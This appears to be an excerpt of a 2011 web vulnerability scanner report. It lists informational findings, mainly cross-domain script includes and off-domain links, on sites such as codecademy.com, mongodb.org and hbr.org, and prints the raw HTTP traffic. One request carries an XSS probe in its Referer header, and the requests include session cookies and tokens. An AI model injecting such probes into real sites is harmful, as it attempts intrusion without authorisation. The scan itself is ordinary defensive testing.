12.4. http://www.mongodb.org/s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css
Issue detail
The page was loaded from a URL containing a query string:http://www.mongodb.org/s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print The response contains the following link to another domain:http://support.atlassian.com/
Request
GET /s/1627/3/1.0/_/download/batch%27/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css?media=print HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://burp/show/5 Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; __utma=266042259.1760966378.1320843794.1320843794.1320843794.1; __utmb=266042259.6.10.1320843794; __utmz=266042259.1320843794.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _mkto_trk=id:017-HGS-593&token:_mch-mongodb.org-1320843794269-29708; JSESSIONID=BA89C686021CA5448E1370C96EB97C02; rack.session=BAh7AA%3D%3D%0A; __utmc=266042259
Response
HTTP/1.1 500 Internal Server Error Vary: Accept-Encoding Cache-Control: max-age=3600 Content-Type: text/html;charset=ISO-8859-1 Date: Wed, 09 Nov 2011 13:19:29 GMT Connection: close X-xgen-cache: yes X-Cache-Info: not cacheable; response code not cacheable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... <strong><a href="http://support.atlassian.com"> Atlassian's support system</a></strong> at <a href="http://support.atlassian.com"> http://support.atlassian.com</a>...[SNIP]...
12.5. http://www.sequoiacap.com/javascripts/sc.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.sequoiacap.com
Path:
/javascripts/sc.js
Issue detail
The page was loaded from a URL containing a query string:http://www.sequoiacap.com/javascripts/sc.js?1320687361 The response contains the following link to another domain:http://www.adobe.com/go/getflashplayer
Request
GET /javascripts/sc.js?1320687361 HTTP/1.1 Host: www.sequoiacap.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sequoiacap.com/42fa0%3Cscript%3Ealert(/XSS/)%3C/script%3Ecf97f530072
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 09 Nov 2011 14:13:04 GMT Content-Type: application/x-javascript Last-Modified: Mon, 07 Nov 2011 17:36:01 GMT Connection: keep-alive Content-Length: 94715 /* * jQuery history plugin * * sample page: http://www.mikage.to/jquery/jquery_history.html * * Copyright (c) 2006-2009 Taku Sano (Mikage Sawatari) * Licensed under the MIT License: * http:/...[SNIP]... <p>This content requires the Flash Player. <a href="http://www.adobe.com/go/getflashplayer"> Download Flash Player</a>...[SNIP]...
13. Cross-domain script include
previous
next
There are 23 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
13.1. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js http://edge.quantserve.com/quant.js http://ethnio.com/remotes/19144 http://harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js http://use.typekit.com/xtw4yuk.js
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <!-- typekit --> <script type="text/javascript" src="//use.typekit.com/xtw4yuk.js"> </script>...[SNIP]... <!-- baynote --> <script type="text/javascript" src="//harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"> </script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"> </script>...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//edge.quantserve.com/quant.js"> </script>...[SNIP]... <!-- usability overlay --> <script language="javascript" src="http://ethnio.com/remotes/19144" type="text/javascript"> </script>...[SNIP]...
13.2. http://www.codecademy.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://platform.twitter.com/widgets.js
Request
GET / HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:31:39 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "00433a79e71d43e083ba0e5bf48420c0" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.108229 X-Varnish: 2227976976 Age: 0 Via: 1.1 varnish Content-Length: 11612 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </a> <script type="text/javascript" src="http://platform.twitter.com/widgets.js"> </script>...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.3. http://www.codecademy.com/about_us
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/about_us
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /about_us HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/register/sign_up Cookie: _session_id=4340d2596108152f6ba6baa861ff0200; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.14.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:48:17 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "ed9a5aaa1fccd0b4c1fa871ec49fcec6" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.034107 X-Varnish: 2091654399 Age: 0 Via: 1.1 varnish Content-Length: 8344 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.4. http://www.codecademy.com/courses/jquery-and-the-dom
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/courses/jquery-and-the-dom
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /courses/jquery-and-the-dom HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/subjects/javascript Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846317893; km_ni=4eba80bafebd380001005614; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.2.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba80bafebd380001005614
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:45:31 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "9d2d18d0f4a678f1f4577ef68ff1e4fb" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.401960 X-Varnish: 2110147050 Age: 0 Via: 1.1 varnish Content-Length: 12937 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.5. http://www.codecademy.com/courses/jquery-and-the-dom/0
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/courses/jquery-and-the-dom/0
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /courses/jquery-and-the-dom/0 HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/courses/jquery-and-the-dom Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846345402; km_ni=4eba840a51a03a00010058d2; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.6.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840a51a03a00010058d2
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:45:50 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "6b04569ff3643fc189f26e279d3e0667" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.166356 X-Varnish: 1502408251 Age: 0 Via: 1.1 varnish Content-Length: 22279 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.6. http://www.codecademy.com/courses/jquery-and-the-dom/1
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/courses/jquery-and-the-dom/1
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /courses/jquery-and-the-dom/1 HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/courses/jquery-and-the-dom/0 Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.7.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:46:33 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "77541ae6897aec5c9c56941dddd2f98d" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.236351 X-Varnish: 2228361154 Age: 0 Via: 1.1 varnish Content-Length: 20507 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.7. http://www.codecademy.com/register
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
POST /register HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/register/sign_up Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.10.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc Content-Type: application/x-www-form-urlencoded Content-Length: 174 utf8=%E2%9C%93&authenticity_token=KhTJ2Z6u1ogoRDWZKh1GzcuAPxegEYGLU0BsTXhCzjI%3D&user%5Bemail%5D=xss&user%5Bpassword%5D=xss&user%5Bpassword_confirmation%5D=xss&commit=Sign+up
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:11 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "da96b02c6671777cb94c18da763f1f6b" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 Set-Cookie: _session_id=7223ebe20bb6b62e4f99c09916b0aae7; path=/; HttpOnly X-Runtime: 0.129815 Content-Length: 7397 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.8. http://www.codecademy.com/register/sign_up
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/register/sign_up
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /register/sign_up HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/courses/jquery-and-the-dom/0 Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.9.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:02 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "ea3d8c08b1c8cae71dcc130da39e37c6" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.055047 X-Varnish: 2091622008 Age: 0 Via: 1.1 varnish Content-Length: 7111 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.9. http://www.codecademy.com/secret
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/secret
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
POST /secret HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/secret/new Cookie: _session_id=f48233f8101236c25dcc893dffbc94d2; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.12.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc Content-Type: application/x-www-form-urlencoded Content-Length: 149 utf8=%E2%9C%93&authenticity_token=NEPDU1wVpsS%2Bqa38nUz3NC43J6SnlC%2Fkd%2B3531DLvwM%3D&user%5Bemail%5D=xss&commit=Send+me+reset+password+instructions
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:22 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "ba4055bf4d29de254dcb20e96ce02d7a" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 Set-Cookie: _session_id=c98cfbe0a81066e5f283c525e40ae90c; path=/; HttpOnly X-Runtime: 0.242881 Content-Length: 6637 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.10. http://www.codecademy.com/secret/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/secret/new
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /secret/new HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/register Cookie: _session_id=f48233f8101236c25dcc893dffbc94d2; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320846349290; km_ni=4eba840d41101a00010081bc; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.11.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963; km_ai=4eba840d41101a00010081bc
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:47:16 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "c6760009b448afb256ef0e07dd35b9da" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.020064 X-Varnish: 315860515 Age: 0 Via: 1.1 varnish Content-Length: 6397 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.11. http://www.codecademy.com/subjects/javascript
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.codecademy.com
Path:
/subjects/javascript
Issue detail
The response dynamically includes the following script from another domain:http://connect.facebook.net/en_US/all.js
Request
GET /subjects/javascript HTTP/1.1 Host: www.codecademy.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.codecademy.com/ Cookie: _session_id=b7640ca9ddcffb8af2fd7c334979c23f; __cfduid=db4a462d070293e742b13078486147a6e1320845498; __cfduid=db4a462d070293e742b13078486147a6e1320845498; kvcd=1320845499598; km_ni=4eba80bafebd380001005614; km_uq=; km_vs=1; km_lv=x; __utma=132207260.1401812232.1320845500.1320845500.1320845500.1; __utmb=132207260.1.10.1320845500; __utmc=132207260; __utmz=132207260.1320845500.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; _chartbeat2=usa3hg953cdmxxth.1320845511963
Response
HTTP/1.1 200 OK Server: cloudflare-nginx Date: Wed, 09 Nov 2011 13:45:19 GMT Content-Type: text/html; charset=utf-8 Connection: keep-alive Etag: "a51d901ad5d46fa96123eeb8402cdbdb" Cache-Control: max-age=0, private, must-revalidate X-Ua-Compatible: IE=Edge,chrome=1 X-Runtime: 0.686218 X-Varnish: 1494258974 Age: 0 Via: 1.1 varnish Content-Length: 10370 <!DOCTYPE html> <html lang='en'> <head> <script type="text/javascript"> var _sf_startpt=(new Date()).getTime(); var root_url = "http://www.codecademy.com/"; var _kmq = _kmq || []; function _kms(u...[SNIP]... </div><script src="http://connect.facebook.net/en_US/all.js#appId=212500508799908&xfbml=1"> </script>...[SNIP]...
13.12. http://www.mongodb.org/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://munchkin.marketo.net/munchkin.js
Request
GET / HTTP/1.1 Host: www.mongodb.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mongodb.com/
Response
HTTP/1.1 200 OK Server: Apache/2.2.16 (Amazon) Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Date: Wed, 09 Nov 2011 13:03:11 GMT Connection: Keep-Alive Set-Cookie: __sid=f4abf7ce84e71ec0885a35b20057e54fc2451ed0; expires=Tue, 04-Nov-2031 13:03:11 GMT; Path=/ Content-Length: 10884 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... </script> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"> </script>...[SNIP]...
13.13. http://www.mongodb.org/display/DOCS/Home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.mongodb.org
Path:
/display/DOCS/Home
Issue detail
The response dynamically includes the following script from another domain:http://munchkin.marketo.net/munchkin.js
Request
